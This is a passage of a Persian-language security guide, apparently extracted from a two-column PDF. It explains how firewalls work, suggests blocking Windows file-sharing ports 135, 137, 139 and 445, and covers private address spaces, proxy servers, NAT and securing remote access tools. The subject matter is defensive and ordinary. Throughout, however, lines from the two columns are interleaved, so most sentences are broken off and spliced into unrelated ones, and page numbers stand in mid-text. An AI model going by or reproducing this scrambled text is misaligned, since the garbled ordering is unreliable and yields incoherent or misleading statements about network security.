ﺍﺳﺖ .ﺍﮔﺮ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻏﻴﺮﻣﺠﺎﺯ ﺑـﺎ ﺭﺍﻳﺎﻧـﺔ ﺷـﻤﺎ ﺍﺭﺗﺒـﺎﻁ ﺑﺮﻗـﺮﺍﺭ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺷﻤﺎ ﻛﻤﻚ ﻧﻤﺎﻳﻨﺪ(.
ﻛﺮﺩﻩ ﺑﺎﺷﺪ ،ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻗﺒﻞ ﺍﺯ ﻋﺒﻮﺭ ﺩﺍﺩﻥ ﺁﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺷﻤﺎ ﺍﮔﺮ ﻋﻠﻴﺮﻏﻢ ﺗﻼﺷﻬﺎﻱ ﺑﺴﻴﺎﺭ ،ﺗﻮﺳﻂ ﻭﻳﺮﻭﺱ ،ﻛـﺮﻡ ﻳـﺎ •
ﻛﺴﺐ ﺍﺟـﺎﺯﻩ ﻛﻨـﺪ .ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ ﺳـﺨﺖ ﺍﻓـﺰﺍﺭﻱ ﻧﻤـﻲ ﺗﻮﺍﻧـﺪ
ﺗﺮﺍﻭﺍ ﺁﻟﻮﺩﻩ ﺷﺪﻳﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﻤﺎﻡ ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟﻮﺩ ﺩﺭ
ﺗﺸﺨﻴﺺ ﺩﻫﺪ ﻛﻪ ﺍﺯ ﻛﺪﺍﻡ ﺑﺮﻧﺎﻣﻪ ﺑـﺮﺍﻱ ﺍﺭﺳـﺎﻝ ﭘﻴـﺎﻡ ﺍﺳـﺘﻔﺎﺩﻩ
ﺭﺍﻳﺎﻧﻪ ﺑﺮﺍﻱ ﻧﻮﻳﺴﻨﺪﺓ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺨﺮﺏ ﺍﺭﺳﺎﻝ ﺷـﻮﺩ .ﺍﻳـﻦ
ﺷﺪﻩ؛ ﺍﻣﺎ ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻳﻚ ﻗﺴﻤﺖ ﺍﺯ ﺗﺠﻬﻴـﺰﺍﺕ ﺳـﺨﺖﺍﻓـﺰﺍﺭﻱ
ﻣﻮﺭﺩ ﺷﺎﻣﻞ ﺩﺍﺩﻩﻫﺎ ﻭ ﺗﻤﺎﻣﻲ ﺁﻧﭽﻪ ﻛﻪ ﺩﺭ ﺭﺍﻳﺎﻧـﺔ ﻗﺮﺑـﺎﻧﻲ
ﺍﺳﺖ ،ﺳﺮﻋﺖ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﭘﺎﻳﻴﻦ ﻧﻤﻲﺁﻭﺭﺩ. ﺛﺒﺖ ﺷﺪﻩ )ﺍﺯ ﺟﻤﻠﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ( ﻣﻲﺷﻮﺩ.
ﺍﮔﺮ ﺩﺍﺭﺍﻱ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺳﺨﺖ ﺍﻓﺰﺍﺭﻱ ﻳﺎ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﻫﺴﺘﻴﺪ
ﻣــﺸﺎﺑﻪ ﺗﻤــﺎﻣﻲ ﺗﺠﻬﻴــﺰﺍﺕ ﺍﻣﻨﻴﺘــﻲ ﺩﻳﮕــﺮ ﺑﺎﻳــﺪ ﻫﻤﻴــﺸﻪ ﺁﻧــﺮﺍ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﭼﮕﻮﻧﻪ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ؟
ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﻛﻨﻴﺪ .ﺧﺮﺍﺑﻜﺎﺭﺍﻥ ﺑﺴﻴﺎﺭ ﺧﻼﻕ ﻫﺴﺘﻨﺪ ﻭ ﻟﺬﺍ ﺑـﻪ ﺭﻭﺯ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺗﻤﺎﻣﻲ ﺑﺴﺘﻪﻫﺎﻳﻲ ﻛﻪ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﺩ
ﺑﻮﺩﻥ ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺑﻜﺎﺭ ﻣﻲﺑﺮﻳﺪ ﺭﺍ ﻧﻈﺎﺭﺕ ﻭ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ ﻛﻪ ﺁﻳﺎ ﺑﺎ ﻗﻮﺍﻧﻴﻦ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺷﺪﻩ
ﺍﺯ ﺍﻫﻤﻴﺖ ﺯﻳﺎﺩﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ. ﻣﻐﺎﻳﺮﺕ ﺩﺍﺭﺩ ﻳﺎ ﺧﻴﺮ .ﺍﮔﺮ ﭼﻨﻴﻦ ﺑﻮﺩ ﺭﺍﻩ ﻋﺒﻮﺭ ﺑـﺴﺘﻪﻫـﺎ ﻣـﺴﺪﻭﺩ
١١١
ﻣﻲﺷﻮﺩ .ﺩﺭ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻭ ﺳﺨﺖﺍﻓـﺰﺍﺭﻱ ﺑﻬﺘـﺮ
ﻓﻀﺎﻫﺎﻱ ﺁﺩﺭﺱ ﺧﺼﻮﺻﻲ
ﺍﺳﺖ ﻗﻮﺍﻧﻴﻦ ﺯﻳﺮ ﭘﻴﺎﺩﻩ ﺷﻮﻧﺪ:
ﻃﺮﺍﺣﻲ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺯ ﺍﺑﺘﺪﺍ ﺑﺪﻳﻨﺼﻮﺭﺕ ﺑﻮﺩ ﻛﻪ ﻫﺮ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﺩﺳﺘﮕﺎﻩ ﺍﺟﺎﺯﻩ ﻧﺪﻫﻴـﺪ ﻫـﻴﭻ ﺑـﺴﺘﻪﺍﻱ ﺍﺯ ﭘﻮﺭﺗﻬـﺎﻱ ،137 ،135 •
ﻣﻮﺟﻮﺩ ﺩﺭ ﺁﻥ ﺁﺩﺭﺱ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧـﻮﺩ ﺭﺍ ﺩﺍﺷـﺖ ﻭ ﻟـﺬﺍ ﻫـﺮ ،139ﻭ TCP/UDP 445ﻋﺒــﻮﺭ ﻛﻨــﺪ .ﺍﻳــﻦ ﭘﻮﺭﺗﻬــﺎ
ﺭﺍﻳﺎﻧﻪ ﻣﻲﺗﻮﺍﻧﺴﺖ ﺑﺎ ﺭﺍﻳﺎﻧﺔ ﺩﻳﮕﺮ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻛﻨﺪ .ﺍﻣـﺮﻭﺯﻩ ﺑـﻪ ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﻭ ﺍﻧﻮﺍﻉ ﺩﻳﮕﺮﻱ ﺍﺯ ﺧﺪﻣﺎﺕ
ﺩﻻﻳﻞ ﺯﻳﺎﺩﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ ﺟﻬـﺎﻧﻲ ﺩﺭ ﺍﻳـﻦ ﺳـﻄﺢ ﭼﻨـﺪﺍﻥ
Windowsﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲ ﮔﻴﺮﻧـﺪ .ﺑـﺎ ﻣﺘﻮﻗـﻒ
ﻣﻄﻠﻮﺏ ﻧﻴﺴﺖ .ﺩﻭ ﺩﻟﻴﻞ ﻋﻤﺪﻩ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ: ﺳــﺎﺧﺘﻦ ﺍﻳــﻦ ﺑــﺴﺘﻪﻫــﺎ ﺍﻃﻤﻴﻨــﺎﻥ ﺧﻮﺍﻫﻴــﺪ ﻳﺎﻓــﺖ ﻛــﻪ
ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻣـﻲﺧﻮﺍﻫﻴـﺪ ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﺭﺍ • ﻫﻴﭽﻜﺲ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺑـﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﺑﺼﻮﺭﺕ ﻣﺠﺰﺍ ﺍﺯ ﺑﻘﻴﻪ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﻴﺪ ﺗـﺎ ﻧﺘﻮﺍﻧﻨـﺪ ﺑﻄـﻮﺭ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﺑﺎ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻛﻨﺪ.
ﻣﺴﺘﻘﻴﻢ ﺑﺎ ﺳـﺎﻳﺮ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﺍﺭﺗﺒـﺎﻁ ﺩﺍﺷـﺘﻪ ﺍﺟﺎﺯﻩ ﻧﺪﻫﻴـﺪ ﻫـﻴﭻ ﺑـﺴﺘﻪﺍﻱ ﺍﺯ ﭘﻮﺭﺗﻬـﺎﻱ ،137 ،135 •
،139ﻭ TCP/UDP 445ﻋﺒــﻮﺭ ﻛﻨــﺪ ،ﻣﮕــﺮ ﺁﻧﻜــﻪ
ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩ ﻫﺎﻱ proxyﻫﻤﭽﻨﻴﻦ ﻣﻲ ﺗﻮﺍﻧﻨـﺪ ﺑـﺮﺍﻱ ﺑﺎﺷﻨﺪ .ﺍﻳﻦ ﻣﺴﺌﻠﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﻣﻮﺭﺩ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺑﺮﺧﻲ
ﺁﺩﺭﺳﻬﺎﻱ IPﻋﺎﺩﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ .ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻋﻤﻮﻣﻲ ﻭ ﺧﺼﻮﺻﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ.
ﻛﻨﺘﺮﻝ ﻧﻮﻉ ﺗﺮﺍﻓﻴﻚ ﻋﺒﻮﺭﻱ ﺍﻳﻨﺘﺮﻧﺖ ﻳﺎ ﺗﺴﻬﻴﻞ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺁﺩﺭﺳﻬﺎﻱ IPﺩﺭ ﻣﺤﻴﻂ ﺍﻳﻨﺘﺮﻧـﺖ ﺍﺧﺘـﺼﺎﺹ •
ﻛﺎﺭﺑﺮ ﻭ ﺷـﺒﻜﻪ ﺑﻜـﺎﺭ ﻣـﻲﺭﻭﻧـﺪ .ﻳـﻚ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﺩﺍﺩﻩ ﻣﻲﺷﻮﻧﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺳﺎﺯﻣﺎﻥ ﺷﻤﺎ ﺑﻪ ﺗﻌﺪﺍﺩ ﻛـﺎﻓﻲ
proxyﻭﺏ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺻﻔﺤﺎﺕ ﺩﺭﺧﻮﺍﺳـﺖﺷـﺪﻩ ﺭﺍ ﺁﺩﺭﺱ IPﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﺑﺨﻮﺍﻫﺪ ﺑـﻪ ﻫﻤـﺔ ﻣﺎﺷـﻴﻨﻬﺎ
ﻧﮕﻬﺪﺍﺭﻱ ﻣﻲﻛﻨﺪ ﻭ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻛـﺎﺭﺑﺮ ﺩﻳﮕـﺮﻱ ﻫﻤـﺎﻥ ﺍﺧﺘﺼﺎﺹ ﺩﻫﺪ .ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﻏﻠﺐ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ
ﺻﻔﺤﻪ ﺭﺍ ﺩﺭﺧﻮﺍﺳﺖ ﻛﻨﺪ ﻧﺴﺨﻪﻫﺎﻱ ﻧﮕﻬـﺪﺍﺭﻱ ﺷـﺪﻩ ﺭﺍ ﺗﻮﺳﻌﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺍﻳﻨﺘﺮﻧﺖ ﻣﻠـﻲ ﭼﻨـﺪ ﺳـﺎﻝ
ﺑﺮﺍﻱ ﻭﻱ ﺍﺭﺳﺎﻝ ﻣﻲﻧﻤﺎﻳﺪ؛ ﻭ ﺑﺎ ﺍﻳﻨﻜﺎﺭ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ﻣـﻮﺭﺩ ﺑﻌﺪ ﺍﺯ ﺍﻳﺠﺎﺩ ﺷﺒﻜﻪ ﻫﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ
ﻧﻴﺎﺯ ﺍﻳﻨﺘﺮﻧﺖ ﻛﺎﻫﺶ ﻣﻲ ﻳﺎﺑﺪ .ﺍﻳـﻦ ﻣﻜـﺎﻧﻴﺰﻡ caching
ﺑﻮﺟﻮﺩ ﺁﻣﺪ.
ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﺩ.
ﺁﺩﺭﺳﻬﺎﻱ IPﻣﺸﺨـﺼﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﻣـﻮﺭﺩ
١١٣
NAT ﺍﺳــﺘﻔﺎﺩﻩ ﻗــﺮﺍﺭ ﻧﻤــﻲﮔﻴﺮﻧــﺪ .ﺍﻳــﻦ ﺁﺩﺭﺳــﻬﺎ "ﻓــﻀﺎﻫﺎﻱ ﺁﺩﺭﺱ
ﺧﺼﻮﺻﻲ" ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﻧﺪ ﻭ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﺩﻭ ﻣﻮﺭﺩ ﺫﻛـﺮ ﺷـﺪﻩ
NATﺟﺎﻳﮕﺎﻫﻲ ﺑﻴﻦ ﺷـﺒﻜﺔ ﻣﺤﻠـﻲ ﻭ ﺍﻳﻨﺘﺮﻧـﺖ ﺩﺍﺭﺩ ﻭ
ﺑﻜﺎﺭ ﺭﻭﻧـﺪ .ﺍﺯ ﺁﻧﺠـﺎ ﻛـﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻳﻲ ﻛـﻪ ﺍﺯ ﻓـﻀﺎﻫﺎﻱ ﺁﺩﺭﺱ
ﻣﺸﺎﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ proxyﺑﺎ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﺷﺒﻜﺔ ﻣﺤﻠﻲ
ﺧﺼﻮﺻﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﺑﺼﻮﺭﺕ ﻣﺴﺘﻘﻴﻢ ﺑﺎ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺭﺗﺒـﺎﻁ
ﻛﻪ ﺁﺩﺭﺳﻬﺎﻱ IPﺧﺼﻮﺻﻲ ﺩﺭ ﺁﻥ ﺑﻜﺎﺭ ﻣـﻲﺭﻭﺩ ﻣـﺮﺗﺒﻂ
ﺑﺮﻗﺮﺍﺭ ﻧﻤﻲﻛﻨﻨﺪ ﺑﻪ ﺁﺩﺭﺳﻬﺎﻱ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩ ﻧﻴﺎﺯ ﻧﺪﺍﺭﻧﺪ .ﺍﮔﺮﭼﻪ
ﻣﻲﺑﺎﺷﺪ .ﺯﻣﺎﻧﻴﻜﻪ ﻳﻚ ﭘﻴﺎﻡ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ NATﺍﺯ ﺷﺒﻜﺔ
ﺳــﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺨﺘﻠﻔــﻲ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺍﺯ ﻣﺠﻤﻮﻋــﻪ ﺁﺩﺭﺳــﻬﺎﻱ
ﻣﺤﻠﻲ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺭﺳﺎﻝ ﻣﻲ ﺷﻮﺩ NAT ،ﺁﻧﺮﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ
ﻣﺸﺎﺑﻬﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ،ﺍﻣﺎ ﻫﻴﭽﻴﻚ ﺍﺯ ﺁﻧﻬﺎ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺳـﺎﻳﺮﻳﻦ
ﺍﺯ ﺁﺩﺭﺱ IPﺧــﻮﺩ ﺍﺭﺳــﺎﻝ ﻣــﻲﻛﻨــﺪ ﻭ ﺍﻳﻨﻄــﻮﺭ ﻭﺍﻧﻤــﻮﺩ
ﺭﺍ ﺑﺒﻴﻨﻨــﺪ ﻭ ﻟــﺬﺍ ﺍﻳــﻦ ﺁﺩﺭﺳــﻬﺎﻱ ﻣــﺸﺎﺑﻪ ﻫــﻴﭻ ﻣــﺸﻜﻠﻲ ﭘﺪﻳــﺪ
ﻣﻲ ﻛﻨﺪ ﻛﻪ ﭘﻴﺎﻡ ﺍﺯ ﭘـﻮﺭﺗﻲ ﻓﺮﺳـﺘﺎﺩﻩ ﺷـﺪﻩ ﻛـﻪ ﺩﺭﺣـﺎﻝ
ﻧﻤﻲﺁﻭﺭﻧﺪ.
ﺍﺳﺘﻔﺎﺩﻩ ﻧﻴﺴﺖ ،ﻭ ﻫﻨﮕﺎﻣﻴﻜﻪ ﭘﺎﺳﺦ ﭘﻴﺎﻡ ﺩﺭﻳﺎﻓﺖ ﻣﻲﺷﻮﺩ،
ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺍﺻﻠﻲ ﺩﺭ ﺷﺒﻜﺔ ﻣﺤﻠـﻲ ﺑـﺎﺯ ﻣـﻲﮔـﺮﺩﺩNAT . ﺩﻭ ﺭﻭﺵ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﻛﻪ ﺁﺩﺭﺱ
ﺷﺒﻴﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ proxyﻋﻤﻞ ﻣﻲﻛﻨـﺪ ،ﺍﻣـﺎ ﺑـﺮﺍﻱ ﺧﺼﻮﺻﻲ ﺩﺍﺭﺩ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻛﻨﺪ:
ﻫﻤﺔ ﺍﻧﻮﺍﻉ ﺗﺮﺍﻓﻴﻚ )ﻭ ﻧﻪ ﻓﻘﻂ ﺗﺮﺍﻓﻴﻚ (webﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ ﻭ ١١٢
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ Proxy
ﺍﺯ ﻣﻜﺎﻧﻴﺰﻡ cachingﻧﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﻧﻤﺎﻳﺪ.
ﺳﺮﻭﻳﺲ ﺩﻫﻨـﺪﺓ proxyﻧـﻮﻉ ﺧﺎﺻـﻲ ﺍﺯ ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ proxyﻭ NATﻫﺮ ﺩﻭ ﻣﺜﻞ ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ ﺍﺳﺖ .ﺍﻳﻦ ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩ ﺩﺍﺭﺍﻱ ﻳﻚ ﺁﺩﺭﺱ ﺩﺭ ﻓـﻀﺎﻱ
ﺁﺗــﺶ ﻫــﺴﺘﻨﺪ ﻭ ﺍﺯ ﺩﺳــﺘﮕﺎﻫﻬﺎﻳﻲ ﻛــﻪ ﺩﺭ ﻓــﻀﺎﻫﺎﻱ ﺁﺩﺭﺱ ﺁﺩﺭﺱ ﺧﺼﻮﺻﻲ ﺍﺳﺖ ﺍﻣﺎ ﻫﻤﭽﻨﻴﻦ ﻳﻚ ﺍﺭﺗﺒﺎﻁ ﻭ ﺁﺩﺭﺱ
ﺧﺼﻮﺻﻲ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﺩﺭ ﺑﺮﺍﺑﺮ ﺍﻧﻮﺍﻉ ﺣﻤﻼﺕ ﺑﻴﺮﻭﻧـﻲ ﻣﺤﺎﻓﻈـﺖ ﺛﺎﻧﻮﻳﻪ ﻧﻴﺰ ﺑﺮﺍﻱ ﺍﺗﺼﺎﻝ ﺑـﻪ ﺍﻳﻨﺘﺮﻧـﺖ ﺩﺍﺭﺩ .ﺍﮔـﺮ ﻛـﺎﺭﺑﺮﻱ
ﻣﻲﻛﻨﻨﺪ. ﺑﺨﻮﺍﻫﺪ ﺍﺯ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﺑﺎ ﺁﺩﺭﺳﻲ ﺩﺭ ﻓـﻀﺎﻱ ﺧـﺼﻮﺻﻲ
ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﺷﻮﺩ ،ﭘﻴﺎﻡ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ
ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﺳﺘﺮﺳﻲ ،ﻣﺪﻳﺮﻳﺖ،
proxyﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﺪ ﻭ ﺍﺯ ﺁﻥ ﻣﻲﺧﻮﺍﻫﺪ ﻛﻪ ﭘﻴﺎﻡ ﺭﺍ ﺑـﻪ
ﻭ ﺭﺍﻫﺒﺮﻱ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﻣﻘﺼﺪ ﻣﻮﺭﺩ ﻧﻈﺮ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺳﺎﻧﺪ .ﺍﻳﻦ ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩ
ﺍﺑﺰﺍﺭﻫــﺎﻱ ﺩﺳﺘﺮﺳــﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ،١١٤ﺍﺑﺰﺍﺭﻫــﺎﻱ ﻣــﺪﻳﺮﻳﺖ ﺍﺯ ﺭﺍﻩ ﺩﺭﺧﻮﺍﺳﺖ ﺭﺍ ﺑﻌﺪ ﺍﺯ ﻓﺮﺳـﺘﺎﺩﻥ ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧـﺖ ﻧﮕﻬـﺪﺍﺭﻱ
ﺩﻭﺭ ١١٥ﻭ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺭﺍﻫﺒﺮﻱ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ١١٦ﺍﻳﻦ ﺍﻣﻜـﺎﻥ ﺭﺍ ﻓـﺮﺍﻫﻢ ﻣﻲﻛﻨﺪ ﻭ ﺯﻣﺎﻧﻴﻜﻪ ﭘﺎﺳﺦ ﺁﻥ ﺑﺎﺯﮔـﺸﺖ ﺁﻧـﺮﺍ ﺑـﻪ ﺩﺳـﺘﮕﺎﻩ
ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﻭ ﺍﺯ ﻃﺮﻳﻖ ﺧـﻂ ﺗﻠﻔـﻦ ﻳـﺎ ﺩﺭﺧﻮﺍﺳﺖﻛﻨﻨﺪﻩ ﺑﺎﺯﭘﺲ ﻣﻲﻓﺮﺳﺘﺪ.
ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻣﻨﺎﺳﺐ ﺭﺍ ﻧﻴﺰ ﺑﺮﺍﻱ ﻣﺤﺎﻓﻈﺖ ﺍﺯ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺑﻜﺎﺭ ﺍﻳﻨﺘﺮﻧﺖ ﻛﻨﺘﺮﻝ ﻧﻤﺎﻳﻴﺪ .ﻫﻨﮕﺎﻣﻴﻜﻪ ﺑﺎ ﺍﻳﻦ ﺭﻭﺵ ﺑﻪ ﺭﺍﻳﺎﻧـﺔ ﺧـﻮﺩ
ﻣﻲﺑﺮﻳﺪ. ﻣﺘﺼﻞ ﻣﻲ ﺷﻮﻳﺪ ﻣﺜﻞ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﭘﺸﺖ ﺻﻔﺤﻪﻛﻠﻴﺪ ﺩﺳـﺘﮕﺎﻩ
ﺧﻮﺩ ﻧﺸﺴﺘﻪﺍﻳﺪ.
ﻼ ﺍﻳﻤﻦ ﻫـﺴﺘﻴﺪ؛ ﺣﺎﻝ ﺍﮔﺮ ﺳﺆﺍﻝ ﺷﻮﺩ ﺑﺎ ﺗﻤﺎﻡ ﺍﻳﻦ ﻛﺎﺭﻫﺎ ﺁﻳﺎ ﻛﺎﻣ ﹰ
ﺦ ﻣﺜﺒﺖ ﺍﺯ ﺍﻃﻤﻴﻨﺎﻥ ﺻﺪ ﺩﺭﺻﺪﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻧﻴـﺴﺖ. ﺑﺎﺯ ﻫﻢ ﭘﺎﺳ ﹺ
ﻗﺎﻧﻮﻥ ﺑﻴﺴﺖ ﻭ ﭼﻬﺎﺭﻡ:
ﻫﻤﻴﺸﻪ ﺍﻳﻦ ﺍﺣﺘﻤﺎﻝ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻗﺒﻞ ﺍﺯ ﺍﺭﺍﺋـﻪ ﺭﺍﻩﺣـﻞ ﺑـﺮﺍﻱ
ﺍﮔﺮ ﺍﺯ ﺍﻣﻜﺎﻧﺎﺕ ﺩﺳﺘﺮﺳـﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺑـﺮﺍﻱ ﻛﻨﺘـﺮﻝ
ﻳﻚ ﺍﺷﻜﺎﻝ ،ﺷﻤﺎ ﺍﺯ ﻫﻤـﺎﻥ ﺍﺷـﻜﺎﻝ ﺁﺳـﻴﺐ ﺑﺒﻴﻨﻴـﺪ .ﻫﻤﭽﻨـﻴﻦ
ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺍﺯ ﺍﻳﻤﻨﻲ
ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﻛﺎﺭﻱ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ﻛـﻪ ﻧﺘـﻮﺍﻥ ﺁﻧـﺮﺍ
ﻻﺯﻡ )ﻧﺎﻣﻬـــﺎﻱ ﻛـــﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫـــﺎﻱ ﻋﺒـــﻮﺭ ﻣﻨﺎﺳـــﺐ(
ﺑﺨﺶ ﺩﻭﻡ
ﻼ ﺍﻳﻤﻦ ﺩﺍﻧﺴﺖ.ﻛﺎﻣ ﹰ
ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ ،ﺗﺎ ﻣﻬﺎﺟﻤﻴﻦ ﻧﺘﻮﺍﻧﻨﺪ ﺍﺯ ﺍﻳﻦ ﺍﺑﺰﺍﺭﻫﺎ ﻋﻠﻴﻪ
